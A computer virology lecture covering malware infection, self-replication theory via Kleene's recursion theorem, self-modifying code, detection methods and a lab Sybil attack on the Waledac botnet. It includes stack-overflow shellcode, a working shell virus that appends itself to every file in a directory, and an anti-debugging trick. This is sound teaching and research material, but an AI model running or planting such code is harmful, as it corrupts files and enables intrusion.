An introduction to Computer Virology - Jean-Yves Marion LORIA

An introduction to Computer Virology
Jean-Yves Marion
LORIA, Université de Nancy
Jean-Yves.Marion@loria.fr
Tuesday 20 December 2011

What is malware?
• Malware is a program that has malicious intentions
• Malware can be a virus, a worm, spyware, a botnet, ...
• Giving a mathematical definition is difficult
✴ So how does it work?

How do malware infections work?
• Social engineering: you can't patch stupidity
• Vulnerabilities: bugs are unavoidable
• Mutations

Social engineering
Excerpts shown on the slide, from the report "Infiltrating WALEDAC Botnet's Covert Operations: Effective Social Engineering, Encrypted HTTP2P Communications, and Fast-Fluxing Networks" (Appendix A: WALEDAC Social Engineering Tactics):
• "[...] and other similar sexual-enhancement drugs. However, there are times when WALEDAC spews out spam that are neither pharmaceutical in nature nor carry other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam are also documented in detail in Appendix B."
• "The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far."
• "At the time this report was written, WALEDAC was seen to have used eight social engineering attacks in an effort to make would-be victims run the malware."
• "[...] WALEDAC with the Christmas Ecard ploy. With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The email campaign then carried the bad news that “Obama refused to be the next president.”"
Figures from the report:
• Figure 1. Christmas ecard spam
• Figure 2. Christmas ecard website
• Figure 2. Timeline of WALEDAC activities
• Figure 5. WALEDAC email carrying the news that Obama refuses to be the next U.S. president
• Figure 6. WALEDAC rips text off from Obama's website, bearing false news that he no longer wants to be the president

Waledac
• Use of a dropper
• Conficker or other malware is used to install Waledac
• Binaries are packed with UPX and homemade packers
• Encryption technologies: RSA & AES (OpenSSL)
• Sends emails from templates
• Scans files to find email addresses and passwords
• Downloads binaries and updates itself

An email template
  Received: from %^C0%^P%^R3-6^ %:qwertyuiopasdfghjklzxcvbnm^%^% ([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%]) by %^A^% with Microsoft SMTPSVC(%^Fsvcver^%); %^D^%
  From: "%^Fmynames^% %^Fsurnames^%"
  User-Agent: Thunderbird %^Ftrunver^%
  To: %^0^%
  Subject: %^Fjuly^%
  http://%^P%^R26^%:qwertyuiopasdfghjklzxcvbnmeuioa^%. %^Fjuly_link^%/^%

3-tier movie of an attack
• Social engineering, targeted attack
• A dropper, client-side exploit
• Install malware

Software bugs

Software bugs (client-side exploit)
• Data are programs
• Bugs are doors if they are exploitable (0-days)
• A bug-free system is safe
• But systems contain bugs ... and there is no general procedure to certify that a program is bug-free, as a consequence of the undecidability of the halting problem (Turing)

Vulnerabilities: a buffer overflow

  #include <string.h>

  void vulnerable(char *user_data) {
    char buffer[4];
    strcpy(buffer, user_data);  /* no bounds check: user_data can overflow buffer */
  }
  ...
  vulnerable("AAAAAAAAAAAAAAAA\xec\xf2\xff\xbf"
             "\x90\x90 ... \x90\x90"  /* long run of \x90 bytes, abridged here */
             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls");

Stack layout shown on the slide: the saved EIP slot (\xFFF0), the saved EBP slot (\xE000), then buffer; after the call the stack is filled with \x90 bytes.

Vulnerabilities: a buffer overflow (continued)
• Same code and stack as above
• When vulnerable() returns, execution resumes at the address FFF0 held in the saved EIP slot

Bugs
• A buffer overflow transforms a program into a self-modifying program
• Wave 1 → Wave 2
• Wave 2 is the code created by the buffer overflow in wave 1

What is malware?
• Infects systems by self-replication
  • Mutation
• Protects itself
  • Obfuscation
  • Self-modification
• Detection
  • Undecidable

Outline
• Foundation 1: Self-replication
• Foundation 2: Self-modification
• Detection
  • Detection by string matching
  • Behavioral detection
• Botnet neutralization

Foundation 1: Self-replication

Self-replicating cellular automata
• Von Neumann (1952), Burks, Codd, Langton

Cohen's formalization (1985)
Cohen's virus (1985), tape diagram: v1 v2 ... vn → v'1 v'2 ... v'm
• Consider a Turing machine $M$ and a viral set $V$
• When $M$ reads $v \in V$, $M$ produces $v' \in V$
• $(M, V)$ is a description of a virus

Self-replication
• A virus has self-replicating capacity
• Reflexive property of the programming language, based on a pointer mechanism to the program code, e.g. $0

  # for each file FName in the current path
  for FName in *; do
    # if FName is not me
    if [ $FName != $0 ]; then
      # add myself at the end of FName
      cat $0 >> $FName
    fi
  done

Figure 2: An example of ecto-symbiote
• By iterating this virus, it will make copies of itself until the system runs out of memory

Self-replication
• Program encoding (Ken Thompson, «Reflections on Trusting Trust», CACM 1984)

  main() { char *s="main() { char *s=%c%s%c; printf(s,34,s,34); }"; printf(s,34,s,34); }

• See also quines
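
The same program-encoding idea can be sketched in Python. This is a minimal illustration that is not taken from the slides: the names QUINE, PROGRAM and run are assumptions introduced here, and the program is executed in memory only so that its output can be compared with its own text.

```python
import contextlib
import io

# Template of a two-line quine: %r is replaced by the template's own repr.
QUINE = 's = %r\nprint(s %% s)'

# Text of the actual program: the template applied to itself.
PROGRAM = QUINE % QUINE


def run(program: str) -> str:
    """Execute program text in a fresh namespace and return what it prints."""
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        exec(program, {})
    return buffer.getvalue()
```

Calling run(PROGRAM) returns the text of PROGRAM followed by the newline that print adds, which is the defining property of a quine.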

Self-replication
• Fixed point combinators (functional programming languages): Y F = F (Y F)
• Computability: recursion theorem of Kleene (1938)
• See the book of N. D. Jones for a programming point of view
• See the books of Rogers or P. Odifreddi for a computability point of view
• See the marvelous books of R. Smullyan ...
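
A fixed point combinator can be written directly in a language with first-class functions. The sketch below uses the strict variant (often called Z), since Python evaluates arguments eagerly; the names fix and factorial are assumptions chosen for the example.

```python
def fix(f):
    """Strict fixed point combinator: fix(f) behaves like f(fix(f))."""
    return (lambda x: f(lambda v: x(x)(v)))(lambda x: f(lambda v: x(x)(v)))


# Factorial written without referring to its own name: recursion goes through `rec`.
factorial = fix(lambda rec: lambda n: 1 if n == 0 else n * rec(n - 1))
```

Here factorial never mentions itself; the combinator supplies the self-reference, which is the functional counterpart of the pointer mechanism $0 used by the shell example.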

A compilation point of view
A worm X scenario
• Open an email attachment by social engineering
• X scans for information
• X extracts a list of email addresses of targeted people
• X sends a copy of itself by email

Worm X specification

  WormX(v, out) {
    info := extract(out);       // extract information
    send(«badguy», info);       // send information
    @bk := findAddress(out);    // find email addresses
    send(@bk, v);               // send worm X to @bk
  }

How to compile Worm X?

Program semantics
• $\llbracket P \rrbracket(d)$ is the value of $P$ on the environment $d$
• $\llbracket \_ \rrbracket : \mathit{Programs} \times D^* \to D^*$, where a value of $D^*$ is a system environment
• From the above example: $\llbracket \mathit{send} \rrbracket(\text{spider@man.com}, \text{"Hello"}, \mathit{Out}) = \mathit{cons}(\mathit{cons}(\text{spider@man.com}, \text{"Hello"}), \mathit{Out})$, where $\mathit{Out}$ is an output stream

Solve a fixed point equation
Suppose that out is a system entry point. A specification of ILoveYou is:

  love(v, out) {
    info := find(out);                                // find information
    out := send(cons("badguy@dom.com", nil), info);
    @bk := extract(out);                              // extract addresses
    out := send(@bk, v);                              // send virus to @bk
    return out;
  }

We have to solve a fixed point equation. v should behave as ILoveYou if:
  $\llbracket W \rrbracket(\mathit{out}) = \llbracket \mathit{WormX} \rrbracket(W, \mathit{out})$
W is a worm satisfying the specification WormX.
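
A general solution to fixed point equations is given by Kleene's recursion theorem
Theorem (Kleene (1938)): If p is a program, then there is a program e such that:
  $\llbracket e \rrbracket(x) = \llbracket p \rrbracket(e, x)$
Proof: let d be a program whose output d(x) on x satisfies
  $\llbracket d(x) \rrbracket(y) = \llbracket x \rrbracket(x, y)$
and let q be a program such that
  $\llbracket q \rrbracket(y, x) = \llbracket p \rrbracket(d(y), x)$
Set e = d(q). Then
  $\llbracket d(q) \rrbracket(x) = \llbracket q \rrbracket(q, x) = \llbracket p \rrbracket(d(q), x)$
A solution of the ILoveYou equation
  $\llbracket v \rrbracket(\mathit{out}) = \llbracket \mathit{love} \rrbracket(v, \mathit{out})$
Set v = e where p = love.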
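
The theorem can be illustrated with a small, harmless Python sketch. Everything here is an assumption made for the illustration (programs are source strings, the names TEMPLATE, kleene_fixed_point, load, P_SOURCE and E_SOURCE are invented, and the specification p only reports the length of the program text it receives). The construction mirrors the quine trick rather than the exact d and q of the proof.

```python
# Source template of the fixed point: it rebuilds its own text in `me`
# and hands it to the specification p as first argument.
TEMPLATE = (
    "p_src = %r\n"
    "template = %r\n"
    "exec(p_src)\n"
    "def e(x):\n"
    "    me = template %% (p_src, template)\n"
    "    return p(me, x)\n"
)


def kleene_fixed_point(p_source: str) -> str:
    """Return the source of a program e such that e(x) == p(source of e, x).

    p_source must define a two-argument function named p.
    """
    return TEMPLATE % (p_source, TEMPLATE)


def load(e_source: str):
    """Execute the source text and return the function e it defines."""
    namespace = {}
    exec(e_source, namespace)
    return namespace["e"]


# Harmless specification: p only measures the program text it is given.
P_SOURCE = "def p(e, x):\n    return (len(e), x)\n"
E_SOURCE = kleene_fixed_point(P_SOURCE)
e = load(E_SOURCE)
```

With these definitions, e(7) evaluates to (len(E_SOURCE), 7): the program e has access to its own text, as the equation $\llbracket e \rrbracket(x) = \llbracket p \rrbracket(e, x)$ requires.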

Malware construction from a specification
• A general solution to fixed point equations is given by Kleene's recursion theorem
• A solution of the ILoveYou equation $\llbracket v \rrbracket(\mathit{out}) = \llbracket \mathit{love} \rrbracket(v, \mathit{out})$: set v = e where p = love
• The Kleene fixed point is a solution of $\llbracket W \rrbracket(\mathit{out}) = \llbracket \mathit{WormX} \rrbracket(W, \mathit{out})$
• We can construct a virus which satisfies a given specification

Self-replicating malware compiler
There is a compiler Comp such that W is the worm satisfying the specification Worm:
  $\llbracket \mathit{Comp} \rrbracket(\mathit{Worm}) = W$
  $\llbracket W \rrbracket(\mathit{out}) = \llbracket \mathit{Worm} \rrbracket(W, \mathit{out})$

Self-replication with mutations
• We can generate malware which satisfies the specification Worm and mutates automatically at each execution:
  $\llbracket e \rrbracket(\mathit{out}) = \llbracket \mathit{Worm} \rrbracket(\mathit{Mutate}(e), \mathit{out})$
  where Mutate is a code mutation procedure
• The construction of e is given by Kleene's recursion theorem

Some historical facts
• 1983: the first official virus on Vax-PDP 11
• 1988: the first worm, which infects 6000 machines
• 1990: Dark Avenger mutation engine (Bulgaria)
• 1995: macro virus
• 2000: worm "I Love You"
• 2001: Palm Pilot virus

Self-replicating compiler with mutations
There is a compiler Comp such that, for all worm specifications Worm and mutation procedures Mutate:
  $\llbracket \mathit{Comp} \rrbracket(\mathit{Worm}) = W$
  $\llbracket W \rrbracket(\mathit{out}) = \llbracket \mathit{Worm} \rrbracket(\mathit{Mutate}(W), \mathit{out})$

References
• PhD thesis of F. Cohen
• L. Adleman (1988), who coined the word «virus»
• Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective. Journal in Computer Virology (3-4): 45-54 (2006)
«A virus is a virus» (Lwoff)

Foundation 2: Self-modification

Data is code
Today's computers are built from two key principles:
1) Instructions are represented as numbers
2) Programs can be stored in memory to be read or written just as numbers
(Patterson & Hennessy)

Applications of self-modifying programs
• Malware mutations
• Code protection (digital rights)
• Compression and packers
• Just-in-time compilers

A simple self-modification
A simple decryption loop
• Wave 1: {@a, @b, @c, @d}, with the loop branch jnz @b
• Wave 2: {@offset}

Ex: Packer UPX
• UPX (packer) applied to Hello.exe: wave 1, then wave 2

Another example of self-modification
  Proxy = { X := Read(); eval(X); }
• An external input is run
• An interpreter of a known or unknown language is used to execute some data

Analyzing self-modifying programs
• Complex to design and to analyze
• Program flow may change
• Usually, in semantics, program and data are separated
• Define by structural induction on P: $P \vdash \sigma \to \sigma'$

Dynamic analysis of self-modifying programs
• Instrument a program
• Monitor memory accesses: read (R), write (W) and execution (X)
• We follow nested self-modifications
• We detect some code protections
• We detect code patterns
  • Code decryption
  • Integrity checking
  • ...
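
The idea of following waves from a monitored trace can be sketched as follows. This is a deliberately simplified rule and an assumption of this sketch, not the algorithm of the tool presented in the talk: a new wave starts whenever the program executes an address that was written during the current wave. The trace format (pairs of an access kind and an address) and the name count_waves are also invented for the example.

```python
from typing import Iterable, Tuple

# One trace event: ("R" | "W" | "X", address)
Event = Tuple[str, int]


def count_waves(trace: Iterable[Event]) -> int:
    """Count code waves in a memory-access trace.

    Simplified rule: executing an address written in the current wave
    means freshly created code is running, so a new wave begins.
    """
    wave = 1
    written = set()  # addresses written since the current wave started
    for kind, address in trace:
        if kind == "W":
            written.add(address)
        elif kind == "X" and address in written:
            wave += 1
            written.clear()
    return wave
```

A program that never executes memory it has written stays in wave 1; a packed binary typically writes its payload and then jumps into it, which this rule reports as wave 2.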

Example (3/5): ACProtect
• hostname packed with ACProtect

Example (4/5): Themida
• hostname packed with Themida

Experiments with TraceSurfer
• TraceSurfer is based on Pin (Intel)
• 95,613 binaries, 80% success, 1,400 binaries/h
• Number of code waves detected over the whole set of binaries: max = 56

Related works
• TraceSurfer, based on Pin (Intel)
• BitBlaze (Berkeley): TEMU, VINE, ...
• DynamoRIO, Ether, Metasm
• Data tainting related methods

Malware detection

Malware detection by string scanning
• A signature is a regular expression denoting a sequence of bytes
• Worm.Y: "Your mac is now under our control !"
• Worm.Y: "Your PC is now under our control !"
• Signature: «Your * is now under our control»
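
Signature scanning of this kind can be sketched with Python's re module on bytes. The wildcard of the slide is rendered here as a bounded regular expression, which is a choice of this sketch; the names SIGNATURES and scan are assumptions, and the signature database holds only the Worm.Y example.

```python
import re

# Signature database: name -> compiled byte-level regular expression.
# ".{1,32}" stands for the "*" of the slide (any short run of bytes).
SIGNATURES = {
    "Worm.Y": re.compile(rb"Your .{1,32} is now under our control"),
}


def scan(data: bytes) -> list:
    """Return the names of all signatures found anywhere in data."""
    return [name for name, signature in SIGNATURES.items() if signature.search(data)]
```

Both variants of the message match the single signature, while a small mutation of the fixed part of the string (for instance a changed word) would escape it.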

Malware detection by string scanning
• A signature is a regular expression denoting a sequence of bytes
• Database of known signatures

Excerpt shown on the slide (Filiol, «Virus informatiques»; translated from French, the left margin is cut off in the source):
• Dynamic mode: the antivirus is resident and permanently monitors the activity of the operating system, the network and the user. It takes control before any action and tries to determine whether a viral risk exists, linked to this action. This mode is resource-hungry and requires relatively powerful machines so as not to be a handicap and push the user (too often the case) to disable this mode in favor of [...]
• Modern antivirus products, for the most effective ones, are supposed to use several techniques (programmed in modules called engines) in order to reduce the risk to a minimum. They can be classified into two groups:
  • Form analysis, commonly called signature search. This latter name is actually improper, since it covers only a very restricted approach to form analysis, which groups many techniques. Form analysis consists in analyzing a code seen as a sequence of bits or bytes, outside any execution context. It is based on the notion of detection scheme ([9], chapter 2), composed of a detection pattern (relative to a malicious code) and a detection function f. The aim is to search, in different ways (characterized by the detection function) and relative to one or more databases (sets of detection schemes), for strings of bits or bytes, of more or less complex structure, listed in these databases as characteristic of a given malicious code.
  • Behavioral analysis, in which an executable file is analyzed in its execution context. This is a functional detection: the «behaviors» or actions of the code are studied. In this context, detection is based on the notion of detection strategy [9].
• Definition 5 (detection strategy): a detection strategy relative to a malicious code is the triple [...]
• Example: consider the detection of a recent and well-known worm such as the Bagle.P worm. The list of the different detection patterns is given in Table 1. The detection function is the logical AND function. This means that for the worm to be detected, the bytes [...]

Table 1: Viral pattern of I-Worm.Bagle.P (source: Filiol)
  Product               Signature size (bytes)   Signature (indices)
  Avast                 8                        12,916 → 12,919 . 12,937 → 12,940
  AVG                   14,575                   533 → 536 - 538 - ...
  Bit Defender          8,330                    0 - 1 - 60 - 128 - 129 - 134 - ...
  Dr Web                6,169                    0 - 1 - 60 - 128 - 129 - 134 - ...
  eTrust/Vet            1,284                    0 - 1 - 60 - 128 - 129 - 134 - ...
  eTrust/Inoculate IT   1,284                    0 - 1 - 60 - 128 - 129 - 134 - ...
  F-Secure 2005         59                       0 - 1 - 60 - 128 - 129 - 546 - ...
  G-Data                54                       0 - 1 - 60 - 128 - 129 - 546 - ...
  KAV Pro               59                       Identical to that of F-Secure 2005
  McAfee 2006           12,127                   0 - 1 - 60 - 128 - 129 - 134 - ...
  NOD 32                21,849                   0 - 1 - 60 - 128 - 129 - 132 - 133 - ...
  Norton 2005           6                        0 - 1 - 60 - 128 - 129 - 134
  Panda Tit. 2006       7,579                    0 - 1 - 60 - 134 - 148 - 182 - 209...
  Sophos                8,436                    0 - 1 - 60 - 128 - 129 - 134 - 148...
  Trend Office Scan     88                       0 - 1 - 60 - 128 - 129 - ...
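
A detection scheme made of a pattern (bytes expected at given indices) and a logical AND detection function can be sketched as below. The table on this slide only lists indices, so the byte values in EXAMPLE_PATTERN are invented placeholders, and the names detect and EXAMPLE_PATTERN are assumptions of this sketch.

```python
from typing import Dict


def detect(data: bytes, pattern: Dict[int, int]) -> bool:
    """Logical AND detection: every indexed byte must exist and equal its expected value."""
    return all(
        index < len(data) and data[index] == value
        for index, value in pattern.items()
    )


# Hypothetical pattern: indices follow the shape of the table, byte values are made up.
EXAMPLE_PATTERN = {0: 0x4D, 1: 0x5A, 60: 0x80}
```

Because the function is a conjunction, changing a single indexed byte is enough to evade the pattern, which is why very short signatures are fragile.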

Malware detection by string scanning
Pros:
• Accuracy: low rate of false positives
  ➡ programs which are not malware are not detected
• Efficient: fast string matching algorithms
  ➡ Karp & Rabin; Knuth, Morris & Pratt; Boyer & Moore
Cons:
• Signatures are quasi-manually constructed
• Vulnerable to malware protections
  ➡ Mutations
  ➡ Code obfuscations

Detection by integrity check
• Identify a file using a hash function
• Files → hash function → hash numbers (numerical fingerprints)
• Cons:
  • File systems are updated, so numerical fingerprints change
  • Difficult to maintain in practice
  • A file may change while keeping the same numerical fingerprint (hash collisions)
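
An integrity check of this kind can be sketched with Python's hashlib. The choice of SHA-256 and the names fingerprint and changed_files are assumptions of this sketch; file contents are passed as bytes so that the example does not depend on the file system.

```python
import hashlib
from typing import Dict, List


def fingerprint(content: bytes) -> str:
    """Numerical fingerprint of a file content (SHA-256, hexadecimal)."""
    return hashlib.sha256(content).hexdigest()


def changed_files(baseline: Dict[str, str], current: Dict[str, bytes]) -> List[str]:
    """Names whose current content does not match the recorded fingerprint (or is new)."""
    return sorted(
        name for name, content in current.items()
        if baseline.get(name) != fingerprint(content)
    )
```

The baseline must be recomputed after every legitimate update, which is the maintenance cost mentioned in the list of cons.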

Behavioral analysis
• Monitor program interactions (sys calls, network calls, ...)
• Behavior patterns
• Detection of program behavior from execution traces
• Trace automata
  • Trace language of a program: generally undecidable
  • Approximation by a regular language: using trace collection, abstracting by reduction or static analysis
  • A trace automaton is a finite state approximation of some trace language
• Functionalities are expressed at a high level
  • API calls shown in the diagram: IcmpSendEcho GetDriveType FindFirstFile FindNextFile GetLogicalDriveStrings GetDriveType FindFirstFile FindFirstFile FindNextFile FindNextFile
• Information leaks can be detected
• Cons:
  • Today behavioral analysis is dynamic, which implies monitoring all processes, or running programs in sandboxes
  • It slows down the system
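
A trace automaton can be sketched as a small finite-state matcher over API call names. The behavior pattern below (enumerate drives, then walk files) is an assumption built from the call names that appear on the slide, and the class and variable names are invented for the illustration.

```python
from typing import Iterable, Sequence


class TraceAutomaton:
    """Finite automaton accepting traces that contain `pattern` as a subsequence."""

    def __init__(self, pattern: Sequence[str]) -> None:
        self.pattern = list(pattern)

    def accepts(self, trace: Iterable[str]) -> bool:
        state = 0  # number of pattern calls matched so far
        for call in trace:
            if state < len(self.pattern) and call == self.pattern[state]:
                state += 1
        return state == len(self.pattern)


# Hypothetical high-level behavior: list the drives, then enumerate files.
DRIVE_SCAN = TraceAutomaton(
    ["GetLogicalDriveStrings", "GetDriveType", "FindFirstFile", "FindNextFile"]
)
```

Unrelated calls interleaved in the trace do not prevent detection, since the automaton only advances on the calls it is waiting for.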

Code protection
Detection is hard because malware is protected:
1. Obfuscation
2. Cryptography
3. Self-modification
4. Anti-analysis tricks

Protections: Self-Modification and Obfuscation
• A lot of malware families use home-made obfuscations, like packers, to protect their binaries, following a standard model
• The obfuscation mechanism is modified for each new distributed binary
• Diagram labels: EP, Unpacking, OEP, Original code

Win32.Swizzor packer
• Example: Win32.Swizzor's packer

Code protection
Detection is hard because malware is protected. Some interesting protection methods:
1. Obfuscation
2. Cryptography
3. Self-modification
4. Anti-analysis tricks

Obfuscation
• Function calls

Code protection
1. Obfuscation
2. Cryptography
3. Self-modification
4. Anti-analysis tricks

Cryptography
• The dropper of the Agobot botnet
• http://quequero.org/AgoBot_Botnet_Reverse_Engineering

Code protection
1. Obfuscation
2. Cryptography
3. Self-modification
4. Anti-analysis tricks

Self-modification
• Packers ... already seen previously ...

Code protection
1. Obfuscation
2. Cryptography
3. Self-modification
4. Anti-analysis tricks

Anti-debugging tricks

  MOV EAX,-1
  INT 2E
  CMP WORD PTR DS:[EDX-2],2ECD

• Call interrupt 2E with an invalid EAX value
• Normal behavior: EDX contains the address of the next instruction
• Test if EDX-2 points to the opcode of INT 2E, which is 2ECD (the bytes CD 2E read as a little-endian word)
• If a debugger is running, then EDX is equal to 0xFFFFFFFF

Consequences of code protection
1. Difficult for a human analyst to understand malware code
   1. OllyDbg
   2. IDA Pro

Welcome to Swizzorland!

Consequences of code protection
1. Difficult for a human analyst to understand malware code
   1. OllyDbg
   2. IDA Pro
2. Difficult to design automatic tools
   1. Static analysis
      • Abstract interpretation
   2. Dynamic analysis

A cruel world
Theorem: Let v be a virus. The set of viruses which are obtained from v by mutation is not decidable (computable).
This is a consequence of Rice's theorem.
Theorem (Rice): Let P be a non-trivial property of the functions computed by programs. Then the set of programs which satisfy P is not decidable.
Idea of the proof: construct a reduction from the halting problem.
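
The reduction can be sketched as follows. This is the standard textbook argument, written with the semantic brackets used earlier in the talk; the names $a$, $m$ and $r_{m,x}$ are introduced here for the sketch only.

```latex
Assume that $P$ is decidable and, without loss of generality, that the
nowhere-defined function does not satisfy $P$ (otherwise argue on the
complement of $P$). Since $P$ is non-trivial, fix a program $a$ such that
$\llbracket a \rrbracket$ satisfies $P$.

For a program $m$ and an input $x$, build the program $r_{m,x}$ which first
runs $m$ on $x$ and then behaves like $a$:
\[
  \llbracket r_{m,x} \rrbracket(y) =
  \begin{cases}
    \llbracket a \rrbracket(y) & \text{if } m \text{ halts on } x, \\
    \text{undefined}           & \text{otherwise.}
  \end{cases}
\]
Then $\llbracket r_{m,x} \rrbracket$ satisfies $P$ if and only if $m$ halts
on $x$. A decision procedure for $P$ would therefore decide the halting
problem, which is impossible.
```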

Morphological analysis in a nutshell
• Signatures are abstract flow graphs
• Detection of a signature subgraph in the abstraction of the program flow graph
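
Searching for a signature graph inside a program flow graph can be sketched with a brute-force backtracking search. This is only an illustration of the subgraph idea, not the algorithm of the detector described in the talk; the graph encoding (node labels plus successor lists), the labels and the name find_signature are assumptions of this sketch.

```python
from typing import Dict, List, Optional, Tuple

# A graph is (labels, successors): node -> label, node -> list of successor nodes.
Graph = Tuple[Dict[int, str], Dict[int, List[int]]]


def find_signature(sig: Graph, prog: Graph) -> Optional[Dict[int, int]]:
    """Return a label- and edge-preserving injection of sig into prog, or None."""
    sig_labels, sig_succ = sig
    prog_labels, prog_succ = prog
    sig_nodes = list(sig_labels)

    def consistent(mapping: Dict[int, int]) -> bool:
        # Every signature edge between mapped nodes must exist in the program.
        for s, p in mapping.items():
            for t in sig_succ.get(s, []):
                if t in mapping and mapping[t] not in prog_succ.get(p, []):
                    return False
        return True

    def extend(i: int, mapping: Dict[int, int]) -> Optional[Dict[int, int]]:
        if i == len(sig_nodes):
            return dict(mapping)
        s = sig_nodes[i]
        for p, label in prog_labels.items():
            if label != sig_labels[s] or p in mapping.values():
                continue
            mapping[s] = p
            if consistent(mapping):
                found = extend(i + 1, mapping)
                if found is not None:
                    return found
            del mapping[s]
        return None

    return extend(0, {})


# Toy signature: a call followed by a conditional jump that loops back or returns.
SIGNATURE: Graph = ({0: "call", 1: "jcc", 2: "ret"}, {0: [1], 1: [2, 0]})
PROGRAM: Graph = (
    {10: "inst", 11: "call", 12: "jcc", 13: "ret", 14: "call"},
    {10: [11], 11: [12], 12: [13, 11], 14: [13]},
)
```

For these toy graphs, find_signature(SIGNATURE, PROGRAM) maps the signature nodes 0, 1, 2 to the program nodes 11, 12, 13. The search is exponential in the worst case, so it is only suitable for small signatures.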

Automatic construction of signatures

Reduction of signatures by graph rewriting

Morphological detection: results
• False negatives
• No experiment on unknown malware
• Signatures with fewer than 18 nodes are potential false negatives
• Restricted signatures of 20 nodes are efficient
• Less than 3 sec. for signatures of 500 nodes

Conclusion about morphological detection
• Benchmarks are good
• Pros
  • More robust against local mutations and obfuscation
  • Easily detects variants of the same malware family
  • Tries to take program semantics into account
  • Quasi-automatic generation of signatures
• Cons
  • Difficult to statically determine the flow graph of self-modifying programs
  • Use of a combination of static and dynamic analysis

Reference
• Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer 2008.

Waledac, again ...
• How to neutralize a botnet?
• Send the US Marshals (see the recent Rustock story)
• Design an attack
• Good understanding of the mechanisms of a botnet (reverse engineering)
• Find an attack
• Large-scale experiments in vitro

Waledac peer-to-peer communication protocol
• Each peer maintains a list of known peers (RLIST)
• Bots exchange parts of their RLIST on a regular basis to maintain connectivity
• Fallback mechanism over HTTP to fetch new peers
• RLIST layout shown on the slide: a global timestamp (1244053204), then entries sorted by local time, each with an id (e.g. repeater 1: 691775154c03424d9f12c17fdf4b640b) ... and a local timestamp

Waledac peer-to-peer communication protocol
• Updates are based on the most recent timestamps
• An IP address does not identify a peer
• The id identifies a peer
• Vulnerability to Sybil attack
• Craft an RLIST update to put «myIP» on the top-500 list, with ids 00000000000000000000000000000001 ... 00000000000000000000000000000500
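
The weakness can be illustrated with a toy in-memory model of the list update. The merge rule below (keep the newest entry per id, sort by timestamp with larger meaning more recent, keep the first 500) is an assumption made for this sketch and is not claimed to be the exact Waledac behavior; the names Peer, merge_rlist and crafted_update are invented, and 192.0.2.1 is a documentation address standing for «myIP».

```python
from typing import Dict, List, NamedTuple


class Peer(NamedTuple):
    peer_id: str
    ip: str
    timestamp: int  # assumption: a larger value means a more recent entry


def merge_rlist(rlist: List[Peer], update: List[Peer], limit: int = 500) -> List[Peer]:
    """Merge an update into an RLIST, keeping the `limit` most recent ids."""
    newest: Dict[str, Peer] = {}
    for peer in list(rlist) + list(update):
        known = newest.get(peer.peer_id)
        if known is None or peer.timestamp > known.timestamp:
            newest[peer.peer_id] = peer
    return sorted(newest.values(), key=lambda p: p.timestamp, reverse=True)[:limit]


def crafted_update(ip: str, timestamp: int, count: int = 500) -> List[Peer]:
    """Distinct ids 00...01 to 00...count, all pointing to the same IP address."""
    return [Peer(f"{i:032d}", ip, timestamp) for i in range(1, count + 1)]
```

Since ids, not IP addresses, identify peers, one machine can announce 500 fresh identities; under the assumed merge rule they displace every older entry of the list.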

Botnet neutralization in the lab
• Attack scenario (diagram labels): attacker, protectors, repeaters, spammers, white C&C

A Sybil attack

Spam sent by the botnet

RLIST infections for repeaters

High Security Lab @ Nancy
• lhs.loria.fr
• Telescope & honeypots
• In vitro experiment clusters

Conclusions

Conclusion
• Mathematical definitions of malware with tools
• High-level representation of binaries
• Abstract signatures which are robust w.r.t. obfuscations
• Experiments and theories
• Analysis tools combining static and dynamic analysis
• Detection and neutralization heuristics

Thanks!